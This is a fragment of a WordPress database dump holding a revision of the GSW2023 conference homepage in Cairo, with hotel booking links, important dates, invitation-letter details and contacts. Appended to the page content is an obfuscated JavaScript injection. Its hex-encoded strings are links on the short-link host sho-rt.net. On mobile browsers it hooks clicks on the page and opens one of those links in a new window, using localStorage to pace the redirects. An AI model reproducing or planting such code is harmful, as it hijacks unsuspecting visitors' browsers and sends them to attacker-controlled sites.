css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:27:00','2023-08-08 15:27:00','',3066,'https://gsw2023.com/?p=5086',0,'revision','',0),
